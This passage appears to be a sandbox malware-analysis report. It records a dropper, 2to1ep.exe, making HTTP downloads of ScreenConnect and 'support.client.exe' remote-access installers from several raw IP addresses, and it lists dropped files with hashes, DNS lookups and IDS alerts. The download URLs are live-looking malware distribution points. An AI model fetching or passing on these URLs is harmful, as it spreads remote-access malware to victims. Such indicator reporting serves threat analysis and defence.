33522to1ep.exeC:\Users\admin\AppData\Local\Temp\_MEI33522\api-ms-win-core-file-l1-2-0.dllexecutable
MD5:059E5BA3DD03713D26DF8883746391A7
SHA256:490126ABFA9F5D7A87268A78A0A511E6749AE52CC1114FDA0460ECEDDF0756F6
33522to1ep.exeC:\Users\admin\AppData\Local\Temp\_MEI33522\api-ms-win-core-datetime-l1-1-0.dllexecutable
MD5:A672B1D8CE985E4A8DA41E0DE58A0E76
SHA256:55E6F9CEE657B6A25F68AEA8A22ECB606DC5C25F69993EB023A452295BE6D2A8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
559
TCP/UDP connections
6 448
DNS requests
332
Threats
732

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5532
SearchApp.exe
GET
200
23.11.40.157:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAjTxtAB8my1oj8MfWpz%2F7Y%3D
NL
binary
314 b
whitelisted
GET
200
204.79.197.203:80
http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQ3L3%2F%2Fa6ADK8NraY2GXzVaYrHG4AQUb6t%2B2v%2BXQ3LsO2d33oJhNYhHQoUCEzMAAAAFUWohyJgUzPcAAAAAAAU%3D
US
binary
959 b
whitelisted
5768
svchost.exe
GET
200
2.16.164.81:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
5768
svchost.exe
GET
200
23.52.181.212:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
5768
svchost.exe
GET
200
48.209.138.168:443
https://settings-win.data.microsoft.com/settings/v3.0/WSD/WaaSAssessment?os=Windows&osVer=10.0.19041.1.amd64fre.vb_release.191206-&ring=Retail&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&FlightRing=Retail&TelemetryLevel=1&HidOverGattReg=C%3A%5CWINDOWS%5CSystem32%5CDriverStore%5CFileRepository%5Chidbthle.inf_amd64_9610b4821fdf82a5%5CMicrosoft.Bluetooth.Profiles.HidOverGatt.dll&AppVer=10.0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&OEMModel=DELL&UpdateOfferedDays=4294967295&ProcessorManufacturer=AuthenticAMD&InstallDate=1661339444&OEMModelBaseBoard=&BranchReadinessLevel=CB&OEMSubModel=J5CR&IsCloudDomainJoined=0&DeferFeatureUpdatePeriodInDays=30&IsDeviceRetailDemo=0&FlightingBranchName=&OSUILocale=en-US&DeviceFamily=Windows.Desktop&WuClientVer=10.0.19041.3996&UninstallActive=1&IsFlightingEnabled=0&OSSkuId=48&ProcessorClockSpeed=3094&TotalPhysicalRAM=6144&SecureBootCapable=0&App=WaaSAssessment&ProcessorCores=6&CurrentBranch=vb_release&InstallLanguage=en-US&DeferQualityUpdatePeriodInDays=0&ServicingBranch=CB&OEMName_Uncleaned=DELL&TPMVersion=0&PrimaryDiskTotalCapacity=262144&InstallationType=Client&AttrDataVer=186&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&IsEdgeWithChromiumInstalled=1&OSVersion=10.0.19045.4046&IsMDMEnrolled=0&ActivationChannel=Retail&HonorWUfBDeferrals=0&FirmwareVersion=A.40&TrendInstalledKey=1&OSArchitecture=AMD64&DefaultUserRegion=244&UpdateManagementGroup=2
US
text
5.84 Kb
whitelisted
8924
2to1ep.exe
GET
200
172.86.90.113:80
http://172.86.90.113/Bin/ScreenConnect.ClientSetup.exe
US
executable
5.28 Mb
unknown
8924
2to1ep.exe
GET
200
45.61.150.97:80
http://45.61.150.97/bin/support.client.exe
US
executable
305 Kb
unknown
8924
2to1ep.exe
GET
104.194.132.138:80
http://104.194.132.138/bin/support.client.exe
US
unknown
8924
2to1ep.exe
GET
200
172.86.91.40:80
http://172.86.91.40/Bin/ScreenConnect.ClientSetup.exe
US
executable
5.39 Mb
unknown
8924
2to1ep.exe
GET
45.61.150.97:80
http://45.61.150.97/Bin/ScreenConnect.ClientSetup.exe
US
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5276
MoUsoCoreWorker.exe
48.209.138.168:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:137
Not routed
whitelisted
48.192.1.64:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5532
SearchApp.exe
92.123.104.61:443
www.bing.com
AKAMAI-ASN1
NL
whitelisted
5532
SearchApp.exe
23.11.40.157:80
ocsp.digicert.com
AKAMAI-AMS
NL
whitelisted
204.79.197.203:80
oneocsp.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5768
svchost.exe
48.209.138.168:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
5768
svchost.exe
2.16.164.81:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
5768
svchost.exe
23.52.181.212:80
www.microsoft.com
AKAMAI-AS
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 48.209.138.168
  • 48.209.133.15
  • 57.153.246.3
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.64
whitelisted
www.bing.com
  • 92.123.104.61
  • 92.123.104.46
  • 92.123.104.63
  • 92.123.104.65
  • 92.123.104.53
  • 92.123.104.44
  • 92.123.104.38
  • 92.123.104.66
  • 92.123.104.58
whitelisted
ocsp.digicert.com
  • 23.11.40.157
whitelisted
oneocsp.microsoft.com
  • 204.79.197.203
whitelisted
google.com
  • 142.250.154.139
  • 142.250.154.101
  • 142.250.154.102
  • 142.250.154.113
  • 142.250.154.100
  • 142.250.154.138
whitelisted
crl.microsoft.com
  • 2.16.164.81
  • 2.16.164.51
  • 2.16.164.49
  • 2.16.164.32
  • 2.16.164.17
  • 2.16.164.107
  • 2.16.164.24
  • 2.16.164.99
  • 2.16.164.34
whitelisted
www.microsoft.com
  • 23.52.181.212
whitelisted
urlhaus.abuse.ch
  • 151.101.130.49
  • 151.101.66.49
  • 151.101.2.49
  • 151.101.194.49
whitelisted
solar-sanat.net
  • 45.14.135.25
unknown

Threats

PID
Process
Class
Message
5768
svchost.exe
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
2232
svchost.exe
Misc activity
INFO [ANY.RUN] .cc TLD domain request
8924
2to1ep.exe
Misc activity
POLICY [ANY.RUN] Python requests User-agent in HTTP request
8924
2to1ep.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 8
8924
2to1ep.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 18
8924
2to1ep.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 8
8924
2to1ep.exe
Misc activity
POLICY [ANY.RUN] Python requests User-agent in HTTP request
8924
2to1ep.exe
Misc activity
ET INFO EXE - Served Inline HTTP
8924
2to1ep.exe
Misc activity
POLICY [ANY.RUN] Python requests User-agent in HTTP request
8924
2to1ep.exe
Misc activity
ET INFO Packed Executable Download
Process
Message
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dxwsetup.exe
DLL_PROCESS_ATTACH
dxwsetup.exe
DLL_PROCESS_ATTACH
dxwsetup.exe
Invalid parameter passed to C runtime function.
dxwsetup.exe
Invalid parameter passed to C runtime function.
dxwsetup.exe
DLL_PROCESS_DETACH
dxwsetup.exe
DLL_PROCESS_DETACH
3e3ev3.exe
CLR: Managed code called FailFast without specifying a reason.
steamcmd.exe
src\tier0\threadtools.cpp (3745) : Assertion Failed: Illegal termination of worker thread 'Thread(0x0168A320/0x00000258/0x'